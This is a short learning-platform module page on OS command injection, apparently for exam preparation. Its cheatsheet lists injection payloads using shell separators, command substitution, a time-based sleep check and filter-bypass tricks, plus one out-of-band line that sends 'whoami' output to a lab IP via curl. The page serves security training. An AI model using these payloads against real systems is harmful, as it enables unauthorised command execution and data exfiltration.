Dashboard › Modules › Command Injections

Command Injections

Web

> Start Learning

📖 Overview

OS command injection techniques.

🎯

Exercises

🃏

Flashcards

🗺️

Mind Maps

📋 Cheatsheet

Basic

; id # Semicolon separator
| id # Pipe separator
|| id # OR separator (runs if first fails)
& id # Background separator
&& id # AND separator (runs if first succeeds)
$(id) # Command substitution
`id` # Backtick substitution

Blind

; sleep 5 # Time-based blind check
| curl http://10.10.14.5/$(whoami) # Out-of-band data exfiltration

Filter Bypass

${IFS} # Use IFS environment variable for space
$'\x20' # Use hex code for space

💻 Command Examples

⚠️ Common Pitfalls

Not testing all delimiters
Missing blind injection

💡 Exam Survival Tips

Test with sleep
Use out-of-band

🎯 Exercises

View All

fill command medium

Write a command injection payload using command substitution:...

🗺️ Mind Maps

Command Injection Flow

Save Your Progress

Command Injections

📖 Overview

📋 Cheatsheet

Basic

Blind

Filter Bypass

💻 Command Examples

⚠️ Common Pitfalls

💡 Exam Survival Tips

🎯 Exercises

🗺️ Mind Maps